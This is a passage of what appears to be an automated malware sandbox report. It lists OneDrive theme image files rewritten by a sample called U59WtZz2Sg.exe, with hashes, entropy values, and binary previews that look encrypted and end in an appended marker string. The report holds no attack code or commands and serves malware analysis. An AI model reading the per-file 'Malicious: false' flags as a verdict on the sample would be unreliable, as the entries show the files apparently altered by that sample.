Preview:	<svg ....+.e.Sq\.t..{..V.S.9...Z?s#..Z.....SQ.:c...\|\.L.....+.q <.E..!.P....\.9:...8...xt....:.!.8.".#..q...>.W.x.h../Ju.lQ.#5@f.<....F..HPo..,.n.............../4D...uX.Q^..g......[..1l.&s1"..^..R..<.Ip....?..!.o.uxFDyW..YD;R.g.lnM.D4....@t[.DR..........N;..{1ba+..~...as.!....}..ZO.K..[.wWl..# .u...m.... .[+.)u.7...<..`.2.rs......Y...s....8C.H..X.4.....r~...x....AI....0T.\|9>..7...C..wU8.D.......G])..g\|.\|...,......6......A.v;.8.q.f.*.F..G$.j..x...$.......K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\blurrect.png

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1135
Entropy (8bit):	7.841191482374736
Encrypted:	false
SSDEEP:	24:2rdeuAS/4lSnj/3tvBFJzrYnDi6P6TI13kT1sqMN7qbD:hG/4lSjftvBFJzrYnuRT1AmD
MD5:	9A208CAA57C761EFC1400A128B3C47A1
SHA1:	E935794388D0769C025AB048698233CCF401337A
SHA-256:	1AA644037C7A9E0B7C1B6640635B2855F63009CD232AE0880303D3C9F62972EF
SHA-512:	E2ADAF45CA277EB69CDD102E7925F54FFB8B25ECF4A5FD128E6D9C985283C2BF05CC44C6FFC4FBC4D0D7D8535A683842D514431B046C8E7E4D25733E39B819E2
Malicious:	false
Reputation:	unknown
Preview:	.PNG...A.G..P....4.m'...7...b..~...u.M..{.U&..dS.2....4..V+.f=A....".....Dq.....{.....0..F......8..t..?... .... 1H.....i.......K.f8v......)w.^a%.\|.O.../.k......X...-....q}..sec.f.....[..A........1.j....}Yx:.M.=..b.i.....d......\|..(.q....`.u.F5..Z..8Jn.a...l)x...W.4..Q.g.8....?.v:./..'..0r.[..n....2X.^..........r.\|....P.....O.H".fQ..1.bCX.......K......#hj..k... .ul..Z8k..]..L.${(..2...`.g(....+......R.......'....t..\.....>..@.#..V..A...I<....J..<tv...Y..=6.......\|..X]...}..e..I1.0.KI..;.....`2..qc..!3.\]..+.m.....h.L.r...j.?..=......L.V..M0...f...,.vo..5_...k...X.Z....v....f3E....J1.C......M..M..DE?....2.....!.%,f..<..j4X...<_6.M.=Eb..w.W...I].\|........(.l...zD.o..~.rb.g[.1f.*.^..I<.'.)...]...GG...).2.B.,.[. .........0E....R..0..mZH.%.RS."S...Xe^Q.Fy_..Y.......4.....>...1....5..$j.+g.>...(.....3.PR~../.P.J.P....z4..G.oG...Twb...g(.SbtW....+...`lL.w....e..[.u\..........k.<..@...,\^_..81.r..K..W...Z.z....+.S.#.z..X.X..3..y..ua?.I.Z(s.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\cancelIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	979
Entropy (8bit):	7.794190487279528
Encrypted:	false
SSDEEP:	24:ueeZBWKiJwLyeq9+QIUOEuM9ZMx5xYxJ8Pek471ugKdVmss/bD:ueoBWKiuOeq9+QnVPJgO71bKd/sjD
MD5:	16644975506168DABA582F2F2FE2DA24
SHA1:	015D97965E09EF7C52F174E4A1C8525B8DBD8255
SHA-256:	169C0455B180D5B6A5DE47BB9E359C735AAE835FC0BE0DCC71ABC6DA44F4A15C
SHA-512:	97799513D45D1AE61AFCAE844A9025D0F3D358AA4BD88F880757EC244AA5405EA537342A7D186C9A0CCFC1385194F36DDF59C7CCF58FC6AA92132A2769060BE4
Malicious:	false
Reputation:	unknown
Preview:	<?xmlo.....tj..m."4.e..&.[<#. ...H...P.....w#S....L..s....t....R...h..9".?....X..x..SC..;......4.YBg....8."...[..g.j...{...b..!....b.KF.......T.....H.{.(....j`.=.....u.+&.._.....Gu.6%...(.....".\R.K..N\|6B.n!..^.q..A3uK...Y[./J.y.X...C...u....l...R.'.Ee.....[_..f.)....&...y.+.ypb..e....p.0...px..QZw....'.E..,....\l}r.Po.?.s..B~....'T;...{G\|$....b+....^.JW.O.P..:....N......Rz.=7..R........9...7..H...(./....^.....#....+...{.@...6.gA...%H..v......i.a..Z.9....0\Lw....r.*.&..o.i#@.6x&;#.g').)&$>...]..........[.Q.....Y....b.ZA......o..X...c.C...5i..c.. ....r........cm...zJ>...dp=.T.......0:......J{........"...s....].X~.R..@.?r.^...p.U.R....1..).k#.....C.~][.8...&...d$.M.....t..:.H. .E..^ .'..P.6.cc...vf3~,[j...9&Fn.....5..m3...}e..=>.....r.. o....V`k?.p. .3t.KV'c.St.;.;...J.).Z.P<....=f....@.T%..%.m..R..^cHr..D..V=...b...5...&u..vi...\|....Zb.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\checkboxComposite.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	551
Entropy (8bit):	7.561990210612549
Encrypted:	false
SSDEEP:	12:tTs0aarQzVrB5nI4mje1kbJX/QiLaw4DDZOP6qH9CTEWGw7PElJqMwieIJuatciD:tT0a4Vd5IuEX/Qi+8SaQT3D5idJJbD
MD5:	12E44BC6C17AEC3920B3CA1BE30FC511
SHA1:	0DB69788DD0EA8294B14112EEFB66D8A6E9F69AA
SHA-256:	DA16B82C452838BF1BA51C28E70702A6E5C186826A9BA92214B12D59E7C9555C
SHA-512:	D195E814206A99503EBF5551160226ECC93D4CD2135859E28E4CEC38B3FC2FB35BADA02F8316FFC951940C3CB1BE4A3A4DEB647DCE4A9B18327BF6B9DF0C3CA2
Malicious:	false
Reputation:	unknown
Preview:	<svg .Iw.R...>a...,..>...e#i.N....~4TqD@iq.....o.?.....T..-...44...m[....y}..X}..1~...<......g..h.+x.Q..f..6.C...3Z\.....c&......\|.k.m@OW.v..Y.L.O+....-..o... ...>K...w.;..a..........=..1.Z.W.l.."...r....U1[~. .....z.....9b..KD.nu...U.0x..+r11...+.9.UFE--...Z.f.T.Xv+..4.Yd.c4.T}j...../n..V....h.n../......J.g..\./aru..2..0...0..P...C..E8a../.R....2....C.as.....c.../..I....Z%2..~F.N.t..M...x;3~.S>.M.$.Z...a.,-*....$\.x.e;:...{.La^.....?dm@....<.h>V.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\checkmark_finished.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	545
Entropy (8bit):	7.609657801718275
Encrypted:	false
SSDEEP:	12:tQ+EvkFxqCgsrepZFJj9eVaj+2BKO/MklPEna7KKVsPtlwtcii9a:tDOVsreHBX//UklPEnOCnGbD
MD5:	D926F4CF6F436B04D01AE0E784576AC0
SHA1:	7D85D65893F96907EC4F35DBEE3AED11C98D2AA5
SHA-256:	2444B33EED473C8B36CF000F2D655C4D7ECE7039664F8FA32FC7EBABE19C27D3
SHA-512:	C8554E490CF06630EDDECACD7C1A919695D758ECB9DD5BBCFC1203772FF2D41F11B9F19DE9176F31B62424A2A707A658015F0019C8A5AD006DBEA9538A3300ED
Malicious:	false
Reputation:	unknown
Preview:	<svg .D...=.L%....+PF....../....&..r.......=3...{..6-.1.....?..Wj..5..Lx..]1kQ....J....>j'.a.....d..^../v.E....yc....p"o.2..-..S......}...}.,...\|`....l..%..-..g..#..SM....,.Dx..z....x.-.......lk..y..2......o.=....xu.r)...H...;..M.zy.G.NQ]...@._.+..[.4;..H...~U~........^.Y..b/.q:3N{{.I..D\......L.k}..?.d)...j..t.>..,.j......[}..\|..`cI4.8...[q....X...~ZPD.t..e{.G.U..+V..PL..q[..g.j.^.^l7.....w...2.pEu....#..P..R\|....(5...ZX..B...N[...2.$.K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\checkmark_hovered.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1089
Entropy (8bit):	7.82342163034865
Encrypted:	false
SSDEEP:	24:coZ0IgnA/YCFyaf/nWIQGEkOwBP8fx4eGTZ5T+OfQefDZCtbD:cogA/YSyk/nWIQ4Ow6x4eYf3fQwDZCND
MD5:	512B32EB59E84A8919FB0C6E854784FB
SHA1:	5DB4C32DE1BF4CB0980B4E90A3A9BDDA1CC720F6
SHA-256:	87F3CD949460B998BF91D0BC28EB50465FA2489832F4272EC82297DD2DF04B14
SHA-512:	7AEC95E1630A8B92869AAF068132AA874D5D2E643F3357333C665607A9DF62362613A7E5AF24D8070838083B5C26DD500B72146563A6613D86B6E4F7E31F4112
Malicious:	false
Reputation:	unknown
Preview:	<?xml[...d....>..9$ .,.8k.\..q...._.+Fan)N_..>X.].......C."...U..g.-.>.F...z..]..@.&8.....s...b...........;$...i..o.N.Re.v(@...A.n...'aV.1.g,\....._...`se..H.z.(\...\..j....@N...~q9y.+srY..}.....4...B..iK).,Q..t..3..aS..x.&....^.)....8..(..}...Jw.JoD.0....@h..vs.~..Po.@...X:.4.?..bb..Y.]......IK...&.E.s....B......x...f..!\.-....%h..n..{........qW.sb...n$.........5 ..^!..<.......\|?.q9.;o.......V...U....u...9.fZ._.....h.....K..c....;I.).eG.~%P.ik..=P...t.n.1.E../.s#.......LD.a........:es..O~Q./V.T...U...U....+rhM..)....Q.........-7..tT......G~.J.r...pP.-.....xx.EIQ..N.%. ..L.....\|.wU.FJg..Q..cSO.3..+.....(......M$...P-PY.!..c..#.v....A.5.U.]k..d..n.}..0.<.Qo..Z.l4....t.......e....G.....2>......EE...':....`.e%]......#Z.`.f..^?n.....W.e6.U..[...l.?..%...h...<9...kOt.Z.w].Y/..y..xV...ri=T.K.a.u...Z.".B...{.E..1..$R..]...2.#.;Y,...l../}.....%..WP.%...-P.......0........G..k..;y... ..E.u..;x...a..x....l$..x.T4F..T.l...\|.....b.KP}...e.#T.....\.....&(.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\checkmark_in_progress.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1093
Entropy (8bit):	7.830955873483419
Encrypted:	false
SSDEEP:	24:eVGwRvogLcJ2E44LcaGU1Up4aJnM/WK0FgC+onCTjybD:egUcJt4YcI1oXqKg4nzD
MD5:	83BBC5F0473F7AAFC221F8B2F740AE10
SHA1:	A0DD0881DDA88EC57FB7D9D83B47258190AF66FF
SHA-256:	11340E81C8FD39AB81057467EEF51EB21E4BC15103805E2E2601FD01ED8C57BE
SHA-512:	90D583988C16E85EB6D9E9C02008581A953BB3686F738CD8848F6262B2CC8215F108F589A7F57AC8BA3F38AC911C66FA2D289A8E73C15C3350CDC032CA97B86F
Malicious:	false
Reputation:	unknown
Preview:	<?xml....77qn.`.x....y........K.L+(.h.k!.C.`M.R.L\.)G..o1.;.hN....9."os.p...l.i....%.:..5_..m./.K..M.d.W..P..E...e..F...4...lj0.B.....xL.....h..q.?..yd.q.xxd.wD...F.X...P.$.U ......4....<]z......hT.....W_...F.ye.W'...)l...0.^...6..'.Jr5./@K..T.........;.O"b....]..F7{.en..q0>....^..M..K..........K..T.~..<.u)...v/.,...E....=./._Q/.B.6.>#....U.f(...D.".4..7...U.=.,....5^'..#.rVA...^&X.]r.;}0..r..X....I.O.....a..&.....$m...7.....z![....].p........Z.Y/....p....^p$T5.;....M....[w)...............b!.D. ^=....l.......h..s.@.&..r...(..B..h...P..3~.}....o R...-(3...&.b..9F\.l''+....S>...Uf..=.7a.n9..U....M.gp.i.....N..Z}0j.....3....O9..v..R..2.2.f.......)...[u..'{.O......#.4.y.c.....z[.....0.SO..S]Y..Z../3....~sVqG.......Z...;.\........B..u..Q._C......H.....^....M.T3\/.k!.+..s.r.GF...9l$..;.I.O\|.\|...U.-(D.~b.[.o...,..P.'._..xN...._b......Z.Y=....$M..?d..1..>A..O...L...3,.........8j....Ko...B>........K...G...e.6....[..%.Y.....cI0.,.b.._...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\checkmark_selected.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1090
Entropy (8bit):	7.801160416142101
Encrypted:	false
SSDEEP:	24:Rn3zBuoIhGhnREj207hVzZvdTj7ETk/6mrsN7RbD:xzooBnREP7hVldTj2kHUD
MD5:	AD70210998E8133BFA6F3F5BFE7708E2
SHA1:	DB9C7A165E4F8F422CC50A2E8173AED014B75C3D
SHA-256:	5917C2238F80856123D4E54201F30ED29747B52969248F6C3349C179957D9E2E
SHA-512:	58970DC50702CA15FAEE63BC6F3061DB4DD87CF0E8ADCF5633F61E08ECCB4E31B801BF22C7F0D1F4608B13B20F76F0E016A03F1C4738B30A3C08E31C431C21A9
Malicious:	false
Reputation:	unknown
Preview:	<?xml...E.G......[p/...!.]........!%.......7AI3.=..y.<J....M...B.V.,N...Y.M..9i%.4.Z#.M.}3K.....1 )..qL@0=..[m..k5n....t.u..A..}g%uu.._s.#...J.GT..C.w)..-..t4%1...{g.w..[.}.:...V.........\|..6}v.v8M.2.n...W%.K.9(..4<A..M..%-..h-.wj...G.n.-.%...]...9.A.]..rV.zN..e>'........f~{..9y.}...P.`..+...o{....]`.D)..J......o..MX.../.........a....+Z...Z.TT.q.......$....k.,("f.j.q.s2..%N.C......;i....ND...SW....v\|v..S.....x..m.`.!.X\|g...jj...Q.o..~...q.sow..^..\.+3..j..Z4.........Q.z.S.Q.c(.ny..!H.sH3.lm..+...$/.!. ..\r..{{#.^.d.8....o.....F.@..'>..p]ek...E..@...7i.."......\|.."Uiew.........._..DxeY.....1<.3-...%.U./.s.....A......2.^o...'..I........r.j.9..T..zZ0.P..#gs...^.....2.v...{..(........r.O.9].......P..E..:.P2...:....<..r.........9...V-.gP. ......j.n"v.z.ZE...D..&..\..L. .@V.r.-o.h3.,..1......[Vr..)...{q.G....M.M.^...I.sBV.8.t....wV.q....?.....%.....D.~..y....C[..?....'.....\|;.....i...y..!...k.......h.b..E.&...0..I9.....[t..?.........-...

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\chevron.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	629
Entropy (8bit):	7.614878128844303
Encrypted:	false
SSDEEP:	12:tey1las5qvcLmhuv8ChNpr1a6FXfclqm28n60V1IggKAf2Stcii9a:teTyqRuv8cg6ZcosVdYbD
MD5:	BF09A26161C8F8FF97F244D9DDDC46E1
SHA1:	ED633F4B746C7E5E5450A672339F2A7BC6DCCD8C
SHA-256:	6C7B7D15B4F3A58409F61738BB79437A5F1C3D394862451400C9C7F16899220B
SHA-512:	7782B5BE9684B123E455C63B9F658184401563D02EA27EA177E9E3B34F858B9CC6D94835429769D93D6238925591A37E52B87CB1496580AF8336E004CEBDD3C0
Malicious:	false
Reputation:	unknown
Preview:	<svg ..3]....v5$...By.._._\o`..[..wIv.+.J.v.....[[..+.{.....f.L......\|...<..;.-........d..r.6.i.n.X...[. .=.Ob...*.~..q~D9.=....x.h..+7=.x........w4.)-.c....._U.?...k.+J..M....69.T.P'k...].Y.V{..k5.2..n.....o(...>.m-...e.Q.n.N.Y...Y(.."D.A.Sk9p~...i.......v.z.T...3t....sf.F]..kU.u>......\|!...&@,.}./..Kv..K......#mU.N....5GQ.6Y..Gl.>d..`..!P.9[~}?....H.=]...xdzV.s..L'.Oac.3..#Q.\.-.&Y......Op...w.....q.......,b.xk..n...8.............HM.l.~....:7.0^d.PKMQ7....{X.....$I....X.XM...cb........R.!....6.......t......_.....YK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\chevronUp.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	598
Entropy (8bit):	7.612199838627386
Encrypted:	false
SSDEEP:	12:tljLnT43vBGjJXqKIok2fM8hJY2RqpACAlpVFl/s/UDfaoe+Pa6dtcii9a:tCpwI5yM8rW8zVL3faoVP1bD
MD5:	813CFFFCA3F1FD6F4731FC33880E1941
SHA1:	7AA1AB70699C80B1352CD747F450E4AD71CE04B7
SHA-256:	45DC46B8D7F59F6F35D90664BC0363EAE6158D034BC695EA8B1336F69D6932AF
SHA-512:	2568E64A1404B7C8C9520644EC902F51736EE18A86DD5CE2CC4AFE13345BE2BFC3D1F07E8F85574717B3AC67C3D67B7576FE8F3455929AFBD26A5FD7F7AA3B18
Malicious:	false
Reputation:	unknown
Preview:	<svg ...bp.`.>k..O...o..G.t.V+`.2..^..\|........x@.M\Q..4Z....m..x..]..._........@{.....P.....N.dm..h.+H...z.....@W^.Y?...U.X\|..#h.A.X9.:k.....dO.Rn29.G.f..[.N....D'.q.,.XdG....;....\|.s...0..}.Mw.......R.fi..?J..,...l.4`...3...F.!.r......l3.L..}H.P.;.G..lD.B<.._.......2\.3...'...\|..y.C0.o .@..R....{.:...vTb...8H..2...D.&#[..B{#..../;o../c.C0..d..7..:...2." _..z.s.i..q.../k`.....(..1.{...k+y...<......~u.&%R:.PF.&p...LA._....ln..fv]..0.Q..O.esJf..Qd[.@z.O..[wJ@.....fr#......k.*..]..9}..T. ..v.P5.XK6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\clock_icon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1269
Entropy (8bit):	7.8200820756701255
Encrypted:	false
SSDEEP:	24:KMBPorzoqIbtfyG8KcPOHL0y7yYVm7Zkw1FzPcW6vaFEmm92A5N/EQhSwHFybD:KMWzoqYtREOrvDVokzxaFRJGSwGD
MD5:	314DF4AA241E05481FBF8A89883969AE
SHA1:	7EE86934AF96E9FAAE986781BD24AC63DE640AE2
SHA-256:	6FC55F9D4181243C9B91E52A9733EE0B8EE794D068CA3EF05D34F3B96B70D029
SHA-512:	014D2108E612FF606599949337DF4099B0795E1528A6F517DA95D18AAA01739115E3C761361AB5C6D9D2466E66567A6BC02B34A4AF0D26949F5BD58E42389CA6
Malicious:	false
Reputation:	unknown
Preview:	<?xml.w".l.'..w..f.D....5.eH.....1...9...4.{..@W..vS.s[..o.u.4d7....)x...\|..8.Q..^#..IKp.......x..c...o8.HK.-PH...2w......W...0..T....y.v}..SC M.aY....b.!N..q8:...e..zyN[.-.e..>...0...,...Q3p...qC0..]...<.BM.{...`).g~Zr..:..r...L.......A.f@+....x...N.3.....`9.P.._@....n.-A....8.....8...6".I....Dw7{.p..).;..F..B.PU..;.6x~..,P#.j6.u..]..w..J9....\.....h..........c.y.%....3G.Y.-nl...W.e.".^S./I....%PR\|..s.\|..R.....>..X.>..E0uB.97q..$.P...C.{nxb.s.....U`....FQ.6.5:9X:.8.f.yV..~.y.<.....i....F..57beY...u......M...\| LDF...Om.8....V%a%.ls....xW.iK..........B.s......Ok..}..=.n.e...._`..R..=]w-...]Ip."n..'...7....T.....@a~2...i..........3 .;../..U.....h...V..Y.E.....gm..S..>......r...=.....[z.I......Y$.R9?3.,.)..).....s.@T.....4.U./ ..x..g......~....Tz~d.............,..UT$...Tz._,d./.D.;.jD$*....Q.%.....O...4....B..S.j/7..=z!..K.....k..p(w.....!..Y...]n..(y.......B........1...V.U1.......X.8....F.F.yZy...gGm.3.=S.w.$$.;O..0R!.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\cloud.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1772
Entropy (8bit):	7.873122070281288
Encrypted:	false
SSDEEP:	48:dwFEny6Df32pwzDXnhRQoXmSEMMPH1qA/T/ZD:dwqnN7GeDXhCo2SERPH1qAV
MD5:	63B7FC5AD49DC8F98BEA8E8CF0B69D55
SHA1:	B3CC2100B763FDC36D19B71F60925C0B2182C7A1
SHA-256:	92850C6F0977E22643841CCB60E7B7002B17F6F7640850A97C6EA02C5B147440
SHA-512:	DA75A2A20872C7E4769B3D78033D7E1D07E879AC2EE845D1C70BCB6747A77A8E52CBA70AAD3067D2D7BADB3846B7DEBE326ECC20E3B2DAD9880D265E9D7D6B65
Malicious:	false
Reputation:	unknown
Preview:	<?xml...K...k.j..f{b......{[..L.-...z\|.8...2.Q...VN.G...-.b.-.......3..{.7....v..suV...^I... l.Mx.q.I..x..d_......'....h...B.s.J/w..z..}..m.R..K.gb...>,..z....[F.0`....R...f.....\1=......].......C.B..c...GsD../:4zh.G+.imJFi.....".s)k.e.[...;....J.6".J.3<3.{.s.U....O......ho...;.j.....a.A....(.R}..N..-...2.......5.A^.....}"...!R..j..z...w...FQ1n.%PW\\..gXyo&o.s?f,. k..W...-)...H..j..xCb.,....I.Y.Qu..iEY....zm..x7g.L..k/.....U.#.L...B.S..~-P....(.G..FR:,N. .b...2@2.$..........W.\|!4.p..;..x....![8...Y.q.;......!.?...sig..D..\7..[m.}....MFk...... .w.i"...N.....v9L...An.a-..n......R5x\|9...E.eT.<..a...`j./v...T.!.iP.......g<.. ..^...CoQ=5.O.<.....,?.$.:...<.)S...{..rM..-.\..4^......{.D~5 ..b..X3E.u.B..Kfs.2......%.q.?.]?P.<9:.^..\Xc...t.mmW?..n/....s...\|.P.4.....rm.......9..K..3.\|.<.N..7...QU...4^k\.+.... t. W+P...S..2=vxEz..jbm.@...S$).8.-...dP.{qm....d..#..h..Vx......^..xMy.a.i...m.u/..5a....x.w.i.y3.j(..M.....C.Q.../....n...L..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\completed_icon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1436
Entropy (8bit):	7.862212896040262
Encrypted:	false
SSDEEP:	24:t+sWtiFEy5lmLcQR0wdba70kq30mrT8ATYIQUBSmDIAoywMRaaK3LbMQNMIlbD:RWtgl5OR0wdbfYI9TYIQUBSvdDBMI1D
MD5:	B588CFD4198AB4E30214B7A12A806918
SHA1:	EDDF6A72A9F87F0484A317BBF8F4AF920BAFF4F0
SHA-256:	749365DEE8663824B4D18DC97EC0DA9947D2ECA7185075D4995B817A67235468
SHA-512:	49A8ED0D3E3ACE357973B780E60FD1D7DCEF093EF387B3C551B9B03C2FCD3022557605495081D225D278D731480ED8F262D0B8C6A73031D4A1AB0474A574A43F
Malicious:	false
Reputation:	unknown
Preview:	<svg 3...~....6...O\...},.d}D..........^ar.....E.0..J.#...>.g......[.xl.@.z....'ZW.@.....l.?...Q'.1_Z]E.L..I....2..8EM..m.@..0...t....v..8...13....M..H.u_.1..w...~...]..}..sY....7.}_..-.....c.q...>..m...[C~%-y.U..C:U..5..e....0..}...\.....s%..!..:.fWf..$..`.NW.t..1PX.......<..~.V.u.....z]^M..^.2..Wh.{.`'..J.>d..\|a.#..+.U.u.V......\.mp.jK...?..]..@.o.R.:..8...Q....Sh....=...Z.}*..G..n....L.:rX...$...K.....y.X..d.C\.....w{.\v...lv.U..%.k...vTX.~?D....#..G...D..a.w...\|G..G....p,..g.0Q.V...Wd..9..X....(.WH....9.d........!$.f..D..51..n..!.....5...Z..?..#X......`.L....,E...dq9.Y..=.?)."..+...o.!.J...@.........m.../.....o..j]....bi..?u}...g-...s.'R.C(.nA..~...Y....i.B........_rA .-aFy.?..........h...^...&..F...xdV.jx..!"wp../.lb.o..m."..8c.\..).....C.i.Q....-..ja.a.5....2:....x}.o....P...~6..[.M?..ho..~oD.07..Q...&}..\.u.$..WMY~..7..x..g...Y[..`D.%5..E.........=.t..U 7m...k(....x.{Q....x,'...-.v..........J^..]....(..z]..G_@.O.\|..kM%x6..X.M..

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\done_graphic.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	15559
Entropy (8bit):	7.98894780135721
Encrypted:	false
SSDEEP:	192:LPBzp7h1VSGomX5icZ5qtYLSkM96jAg6YKzHpuVLYnBb+ZOaWd6lltA1MXRoOy7b:LPX7fow8cHoaJM96jxKo6gHl4fL
MD5:	A0616843A3C8CAACC95AA4C7458216E2
SHA1:	F389A1FB381E497C5138AA54C48B17F001E7DBE5
SHA-256:	032BD376643F67E90FC86E696387E64DE9DE0CDA37D33701C1004C91486EFC60
SHA-512:	3206DB1DA98BF5961A340B895FA05AB119E339A43384966483148186BD76313DAA087EDE3F727D5BC085E37EEF630C24D85F973DBB60CBC1988C0EFDA5C1D9BC
Malicious:	false
Reputation:	unknown
Preview:	<svg R..G..0{<.N,a<...S%1X....(..r$...O.+=K....n..(..5sC\|; r4..+@y...\_.....B.C..q.[..".b].#..Q.......;..)bw.d!.db0rWK.&>.Pwc..S[..Tx.V.).0...h.......%..]:......... .MX..]..a..A.a.....Q.7..Q...G.B0R...........:..=m[.....EvB/.rT.....K.[.Y.M.../....%..H\a..em'.}....0.......C.RU....JH.Z.!...H.[I.'...9...i.....`_k......x.g.&...=:.OzX)w.;w..H....#5.z..R.N....(.y>....A..l.......r[.FX9.c0`\|.........0#..'./!.NH.H.xw.rj..e...O..e]C......pPCy]..O...4..!....km:. j..+.`2n.l.d.(Z..~.I..j$.(.4...=...y.l.)'..3!k...(.QU.3...!..5ej...).....F.X..g(..+.j..g).E.ZZ8.d......_.C.}[.._.1C...y .0....&.k..4..h......@.ko..H......W...X#.."..K$fG..(.Rj...........Q=....i........c.k.:.....F..md..T:Lr5b..x.Z.,....%...#.gUy./.#.K.X$.w.......WB.m...?^...G.....f..R.....t..h#..o.5..~yD.f.-/c>..=9..nat..TL.fBY...i.h..C..J..t..c.....Y...)...%:..H.(v.*.u..$.~p....n...-.....>.^...H....]....,7...<v..&y.u.uI"..F..b~.Cz;..;A.y.f.....Q.^q...^.V...,.....7p...\|.'.I....8......W..U..'.B...j.

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\errorIcon.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	964
Entropy (8bit):	7.783189286069666
Encrypted:	false
SSDEEP:	24:teyF7w3Vp6GiAGfpcm8UiiTXlKMndJpuXqKvSpo9/bD:gD3D17cuhU/vdJMbhD
MD5:	47C10D161CBE139C236DA02EC28456BA
SHA1:	E5213D0FF424A931C5E923836A30D0DFCE39BADE
SHA-256:	7857657557FB5954FD3779B713DCF22685E12305BCFF2A434710BB985FB1CA64
SHA-512:	A9A99AF113DE147C233BF8E740E1584F53AD577FBBB588FED8A50246909C45975D8D9803B650BEDCFADBCA989223C20DA6E88C5FC94B87448CA7FD515128B010
Malicious:	false
Reputation:	unknown
Preview:	<svg ...5...\|.ag......%4..S4TXtQ#D......"..B......8.O.H....k(2...H.....d.Z.g.f...B....T.Il1g.....Q%.u.l^..G.`P/.@............4.NX.......H...@<kZf. .S./a+.M.K.....E.......C@.k.._..t..B..h.lqE H.........HU.e!M......C=XPK....&fX..\|.W7...h....!..\|..r.g.IQ.z........M.....D.j..}..HL9"....`...z...}............v.V:k.G.)..\|2..,..rLH......G.N'.......`J.h...2...3u:........g0.M.F.E$...2..Z..TL..).@'.`/..].{I.....{F.G_.M.9.02.....Z..X..3.J.....I..zV...=.......zpE.;....Vo..V`..>7,g...Cg.3.S.h\|.7..9:"..oo.....\|-.......Y...i.$.w.\...B..k....x........C..../g!r.X...8~..>.A\|.......-.....{.....^..:UM.7oa\.$.....]..W.h/..=S....I.D8 .V..W+/.:~.v0.JE.%X...x..k...+./;#3onq".....^...[...S.gj.........f..D.Qm.... ...."'..&.....'...p.}....`.......{2.....e.3...z.s.;..8&....... .1.......'........%(<.<3...MP.....B....,#.....&2.{,j.2on..\|.m...)f......L..K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\AppData\Local\Microsoft\OneDrive\19.086.0502.0006\images\darkTheme\finderExtensionPrompt.svg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	36719
Entropy (8bit):	7.995840800567245
Encrypted:	true
SSDEEP:	768:2ssh2ZrUXJ1XUnr85M+e87oGW/K+9sR/4hXaNBgQN5sn2/a4CkhLEnhC+by/KbxE:JsUeXJ1X0rT87oG+sR/4hqN9Tsn2/aLE
